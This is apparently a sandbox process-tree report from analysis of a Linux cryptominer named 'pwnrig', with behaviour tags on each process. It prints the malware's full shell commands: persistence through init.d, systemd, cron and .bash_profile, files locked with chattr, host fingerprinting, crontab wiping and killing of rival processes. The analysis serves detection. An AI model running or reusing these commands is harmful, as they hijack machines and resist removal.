-
-
/usr/bin/rmrm -rf /bin/initdr3⤵PID:2060
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/initdr3⤵
- Writes file to system bin folder
PID:2061
-
-
/usr/bin/teetee /etc/init.d/pwnrig3⤵
- Modifies init.d
PID:2063
-
-
/usr/bin/sedsed -i "1 s/-e //" /etc/init.d/pwnrig3⤵
- Modifies init.d
PID:2064
-
-
/usr/bin/chmodchmod +x /etc/init.d/pwnrig /bin/initdr3⤵PID:2065
-
-
/usr/sbin/update-rc.dupdate-rc.d pwnrig defaults3⤵PID:2066
-
/usr/local/sbin/systemctlsystemctl daemon-reload4⤵PID:2067
-
-
/usr/local/bin/systemctlsystemctl daemon-reload4⤵PID:2067
-
-
/usr/sbin/systemctlsystemctl daemon-reload4⤵PID:2067
-
-
/usr/bin/systemctlsystemctl daemon-reload4⤵
- Reads EFI boot settings
PID:2067
-
-
-
/usr/sbin/update-rc.dupdate-rc.d pwnrig enable3⤵PID:2093
-
/usr/local/sbin/systemctlsystemctl --quiet enable pwnrig4⤵PID:2094
-
-
/usr/local/bin/systemctlsystemctl --quiet enable pwnrig4⤵PID:2094
-
-
/usr/sbin/systemctlsystemctl --quiet enable pwnrig4⤵PID:2094
-
-
/usr/bin/systemctlsystemctl --quiet enable pwnrig4⤵
- Reads EFI boot settings
PID:2094
-
-
/usr/local/sbin/systemctlsystemctl daemon-reload4⤵PID:2095
-
-
/usr/local/bin/systemctlsystemctl daemon-reload4⤵PID:2095
-
-
/usr/sbin/systemctlsystemctl daemon-reload4⤵PID:2095
-
-
/usr/bin/systemctlsystemctl daemon-reload4⤵
- Reads EFI boot settings
PID:2095
-
-
-
/usr/bin/chattrchattr +i +a /etc/init.d/pwnrig /bin/initdr3⤵PID:2153
-
-
/usr/bin/whichwhich systemctl3⤵PID:2154
-
-
/usr/bin/chattrchattr -i -a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr3⤵PID:2155
-
-
/usr/bin/rmrm -rf /bin/sysdr3⤵PID:2156
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/sysdr3⤵
- Writes file to system bin folder
PID:2157
-
-
/usr/bin/teetee /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service3⤵
- Modifies systemd
PID:2159
-
-
/usr/bin/sedsed -i "1 s/-e //" /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service3⤵PID:2160
-
-
/usr/bin/chattrchattr +i +a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr3⤵PID:2161
-
-
/usr/bin/systemctlsystemctl enable pwnrige.service3⤵
- Reads EFI boot settings
- Enumerates kernel/hardware configuration
PID:2162
-
-
/usr/bin/systemctlsystemctl enable pwnrigl.service3⤵
- Reads EFI boot settings
PID:2218
-
-
/usr/bin/systemctlsystemctl daemon-reload3⤵
- Reads EFI boot settings
PID:2268
-
-
/usr/bin/systemctlsystemctl reload-or-restart pwnrige.service3⤵
- Reads EFI boot settings
- Enumerates kernel/hardware configuration
PID:2380
-
-
-
/usr/bin/hostnamehostname -I1⤵PID:1976
-
/usr/bin/awkawk "{print \$1}"1⤵PID:1978
-
/usr/bin/awkawk "{print \"-\"\$2}"1⤵PID:1983
-
/usr/bin/headhead -n 11⤵PID:1982
-
/usr/bin/grepgrep "Port "1⤵PID:1981
-
/usr/bin/catcat /etc/ssh/sshd_config1⤵PID:1980
-
/usr/bin/sedsed -e "s/\$//"1⤵PID:1992
-
/usr/bin/sedsed -e "s/^ *//"1⤵PID:1991
-
/usr/bin/cutcut -d: -f21⤵PID:1990
-
/usr/bin/grepgrep -m 1 "model name" /proc/cpuinfo1⤵
- Checks CPU configuration
PID:1989
-
/usr/bin/awkawk "{print \$1}"1⤵PID:1995
-
/usr/bin/awkawk "{print \$4}"1⤵PID:1998
-
/usr/bin/awkawk "{print \$4}"1⤵PID:2001
-
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d1⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
PID:2438 -
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""2⤵PID:2462
-
/usr/bin/whoamiwhoami3⤵PID:2473
-
-
/usr/bin/hostnamehostname3⤵PID:2474
-
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo3⤵
- Checks CPU configuration
PID:2475
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"2⤵PID:2491
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"3⤵PID:2493
-
-
/usr/bin/psps -A "-ostat,ppid"3⤵
- Reads runtime system information
PID:2492
-
-
/usr/bin/idid -u3⤵PID:2495
-
-
/usr/bin/grepgrep -v grep3⤵PID:2498
-
-
/usr/bin/grepgrep /etc/cron3⤵PID:2497
-
-
/usr/bin/psps x3⤵
- Reads runtime system information
PID:2496
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"2⤵PID:2500
-
/usr/bin/idid -u3⤵PID:2501
-
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"3⤵PID:2506
-
-
/usr/bin/grepgrep -v /usr/sbin/httpd3⤵PID:2505
-
-
/usr/bin/grepgrep -v -- "-bash[[:space:]]*\$"3⤵PID:2504
-
-
/usr/bin/grepgrep -v grep3⤵PID:2503
-
-
/usr/bin/psps aux3⤵
- Reads CPU attributes
PID:2502
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"2⤵PID:2508
-
/usr/bin/idid -u3⤵PID:2509
-
-
-
/usr/bin/hostnamehostname -I1⤵PID:2465
-
/usr/bin/awkawk "{print \$1}"1⤵PID:2467
-
/usr/bin/awkawk "{print \"-\"\$2}"1⤵PID:2472
-
/usr/bin/headhead -n 11⤵PID:2471
-
/usr/bin/grepgrep "Port "1⤵PID:2470
-
/usr/bin/catcat /etc/ssh/sshd_config1⤵PID:2469
-
/usr/bin/sedsed -e "s/\$//"1⤵PID:2481
-
/usr/bin/sedsed -e "s/^ *//"1⤵PID:2480
-
/usr/bin/cutcut -d: -f21⤵PID:2479
-
/usr/bin/grepgrep -m 1 "model name" /proc/cpuinfo1⤵
- Checks CPU configuration
PID:2478
-
/usr/bin/awkawk "{print \$1}"1⤵PID:2484
-
/usr/bin/awkawk "{print \$4}"1⤵PID:2487
-
/usr/bin/awkawk "{print \$4}"1⤵PID:2490
-
/usr/bin/wcwc -l1⤵PID:2515
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"1⤵PID:2514
-
/usr/bin/grepgrep -- "-bash[[:space:]]*\$"1⤵PID:2513
-
/usr/bin/grepgrep -v grep1⤵PID:2512
-
/usr/bin/psps aux1⤵
- Reads CPU attributes
PID:2511
-
/usr/bin/crontabcrontab -r1⤵PID:2697
-
/usr/bin/pkillpkill -f .klibsystem51⤵
- Reads CPU attributes
- Reads runtime system information
PID:2698
-
/usr/bin/pkillpkill -f .klibsystem41⤵PID:2699
-
/usr/bin/bashbash -c "echo \"* * * * * /var/run/.klibsystem5 >/dev/null 2>&1\" | crontab -"1⤵PID:2700
-
/usr/bin/crontabcrontab -2⤵PID:2702
-
-
/usr/bin/chattrchattr -ia /etc/cron.d/.lib-knlib41⤵PID:2703
-
/usr/bin/chattrchattr +ia /etc/cron.d/.lib-knlib41⤵PID:2704
-
/usr/bin/chattrchattr -ia /var/spool/cron/.lib-knlib41⤵PID:2705
-
/usr/bin/chattrchattr +ia /var/spool/cron/.lib-knlib41⤵PID:2706
-
/usr/bin/chattrchattr -ia /etc/cron.hourly/.lib-knlib41⤵PID:2707
-
/usr/bin/chattrchattr +ia /etc/cron.hourly/.lib-knlib41⤵
- Attempts to change immutable files
PID:2708
-
/usr/bin/chattrchattr -ia /etc/cron.daily/.lib-knlib41⤵PID:2709
-
/usr/bin/chattrchattr +ia /etc/cron.daily/.lib-knlib41⤵PID:2710
-
/usr/bin/chattrchattr -ia /etc/cron.weekly/.lib-knlib41⤵
- Attempts to change immutable files
PID:2711
-
/usr/bin/chattrchattr +ia /etc/cron.weekly/.lib-knlib41⤵
- Attempts to change immutable files
PID:2712
-
/usr/bin/chattrchattr -ia /etc/cron.monthly/.lib-knlib41⤵PID:2713
-
/usr/bin/chattrchattr +ia /etc/cron.monthly/.lib-knlib41⤵PID:2714
-
/usr/bin/chattrchattr -ia /etc/anacrontab1⤵PID:2715
-
/usr/bin/chattrchattr +ia /etc/anacrontab1⤵PID:2716
-
/tmp/sys-helper/tmp/sys-helper1⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:2717
-
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn1⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
PID:2718 -
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""2⤵
- Attempts to change immutable files
PID:2719 -
/usr/bin/whoamiwhoami3⤵PID:2739
-
-
/usr/bin/hostnamehostname3⤵PID:2740
-
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo3⤵
- Checks CPU configuration
PID:2741
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"2⤵PID:2757
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"3⤵PID:2759
-
-
/usr/bin/psps -A "-ostat,ppid"3⤵
- Reads runtime system information
PID:2758
-
-
/usr/bin/idid -u3⤵PID:2761
-
-
/usr/bin/grepgrep -v grep3⤵PID:2764
-
-
/usr/bin/grepgrep /etc/cron3⤵PID:2763
-
-
/usr/bin/psps x3⤵PID:2762
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/service-agent';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\nWants=network.target\\nAfter=syslog.target network-online.target\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\nWantedBy=multi-user.target\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"2⤵
- Attempts to change immutable files
- Writes file to tmp directory
PID:2766 -
/usr/bin/idid -u3⤵PID:2767
-
-
/usr/bin/idid -u3⤵PID:2768
-
-
/usr/bin/chattrchattr -i -a /bin/bprofr "~/.bash_profile"3⤵PID:2769
-
-
/usr/bin/rmrm -rf /bin/bprofr3⤵PID:2770
-
-
/usr/bin/sedsed -i /bprofr/d "~/.bash_profile"3⤵
- Attempts to change immutable files
PID:2771
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/bprofr3⤵
- Writes file to system bin folder
PID:2772
-
-
/usr/bin/idid -u3⤵PID:2773
-
-
/usr/bin/chattrchattr +i +a /bin/bprofr "~/.bash_profile"3⤵PID:2774
-
-
/usr/bin/mkdirmkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly3⤵PID:2775
-
-
/usr/bin/chattrchattr -i -a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr3⤵
- Attempts to change immutable files
PID:2776
-
-
/usr/bin/rmrm -rf /bin/crondr3⤵PID:2777
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/crondr3⤵
- Writes file to system bin folder
PID:2778
-
-
/usr/bin/teetee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig3⤵
- Creates/modifies Cron job
PID:2780
-
-
/usr/bin/sedsed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig3⤵
- Creates/modifies Cron job
PID:2781
-
-
/usr/bin/chmodchmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr3⤵PID:2782
-
-
/usr/bin/chattrchattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr3⤵
- Attempts to change immutable files
PID:2783
-
-
/usr/bin/whichwhich chkconfig3⤵PID:2784
-
-
/usr/bin/whichwhich update-rc.d3⤵PID:2785
-
-
/usr/bin/chattrchattr -i -a /etc/init.d/pwnrig /bin/initdr3⤵
- Attempts to change immutable files
PID:2786
-
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig disable3⤵PID:2787
-
/usr/local/sbin/systemctlsystemctl --quiet disable pwnrig4⤵PID:2788
-
-
/usr/local/bin/systemctlsystemctl --quiet disable pwnrig4⤵PID:2788
-
-
/usr/sbin/systemctlsystemctl --quiet disable pwnrig4⤵PID:2788
-
-
/usr/bin/systemctlsystemctl --quiet disable pwnrig4⤵
- Reads EFI boot settings
PID:2788
-
-
/usr/local/sbin/systemctlsystemctl daemon-reload4⤵PID:2814
-
-
/usr/local/bin/systemctlsystemctl daemon-reload4⤵PID:2814
-
-
/usr/sbin/systemctlsystemctl daemon-reload4⤵PID:2814
-
-
/usr/bin/systemctlsystemctl daemon-reload4⤵
- Reads EFI boot settings
PID:2814
-
-
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig remove3⤵PID:2840
-
/usr/local/sbin/systemctlsystemctl daemon-reload4⤵PID:2841
-
-
/usr/local/bin/systemctlsystemctl daemon-reload4⤵PID:2841
-
-
/usr/sbin/systemctlsystemctl daemon-reload4⤵PID:2841
-
-
/usr/bin/systemctlsystemctl daemon-reload4⤵
- Reads EFI boot settings
PID:2841
-
-
-
/usr/bin/rmrm -rf /bin/initdr3⤵PID:2867
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/initdr3⤵
- Writes file to system bin folder
PID:2868
-
-
/usr/bin/teetee /etc/init.d/pwnrig3⤵PID:2870
-
-
/usr/sbin/update-rc.dupdate-rc.d pwnrig enable3⤵PID:2900
-
/usr/local/sbin/systemctlsystemctl --quiet enable pwnrig4⤵PID:2901
-
-
/usr/local/bin/systemctlsystemctl --quiet enable pwnrig4⤵PID:2901
-
-
/usr/sbin/systemctlsystemctl --quiet enable pwnrig4⤵PID:2901
-
-
/usr/bin/systemctlsystemctl --quiet enable pwnrig4⤵
- Reads EFI boot settings
PID:2901
-
-
/usr/local/sbin/systemctlsystemctl daemon-reload4⤵PID:2902
-
-
/usr/local/bin/systemctlsystemctl daemon-reload4⤵PID:2902
-
-
/usr/sbin/systemctlsystemctl daemon-reload4⤵PID:2902
-
-
/usr/bin/systemctlsystemctl daemon-reload4⤵
- Reads EFI boot settings
PID:2902
-
-
-
/usr/bin/chattrchattr +i +a /etc/init.d/pwnrig /bin/initdr3⤵
- Attempts to change immutable files
PID:2974
-
-
/usr/bin/whichwhich systemctl3⤵PID:2975
-
-
/usr/bin/chattrchattr -i -a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr3⤵PID:2976
-
-
/usr/bin/rmrm -rf /bin/sysdr3⤵PID:2977
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/sysdr3⤵
- Writes file to system bin folder
PID:2978
-
-
/usr/bin/teetee /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service3⤵
- Modifies systemd
PID:2983
-
-
/usr/bin/sedsed -i "1 s/-e //" /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service3⤵
- Attempts to change immutable files
PID:2986
-
-
/usr/bin/chattrchattr +i +a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr3⤵PID:2987
-
-
/usr/bin/systemctlsystemctl enable pwnrige.service3⤵
- Reads EFI boot settings
PID:2988
-
-
/usr/bin/systemctlsystemctl enable pwnrigl.service3⤵
- Reads EFI boot settings
PID:3018
-
-
/usr/bin/systemctlsystemctl daemon-reload3⤵
- Reads EFI boot settings
PID:3044
-
-
/usr/bin/systemctlsystemctl reload-or-restart pwnrige.service3⤵
- Reads EFI boot settings
PID:3070
-
-
-
/usr/bin/hostnamehostname -I1⤵PID:2729
-
/usr/bin/awkawk "{print \$1}"1⤵PID:2732
-
/usr/bin/headhead -n 11⤵PID:2737
-
/usr/bin/grepgrep "Port "1⤵PID:2736
-
/usr/bin/awkawk "{print \"-\"\$2}"1⤵PID:2738
-
/usr/bin/catcat /etc/ssh/sshd_config1⤵PID:2735
-
/usr/bin/cutcut -d: -f21⤵PID:2745
-
/usr/bin/sedsed -e "s/^ *//"1⤵PID:2746
-
/usr/bin/sedsed -e "s/\$//"1⤵PID:2747
-
/usr/bin/grepgrep -m 1 "model name" /proc/cpuinfo1⤵
- Checks CPU configuration
PID:2744
-
/usr/bin/awkawk "{print \$1}"1⤵PID:2750
-
/usr/bin/awkawk "{print \$4}"1⤵PID:2753
-
/usr/bin/awkawk "{print \$4}"1⤵PID:2756
-
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d1⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
PID:3127 -
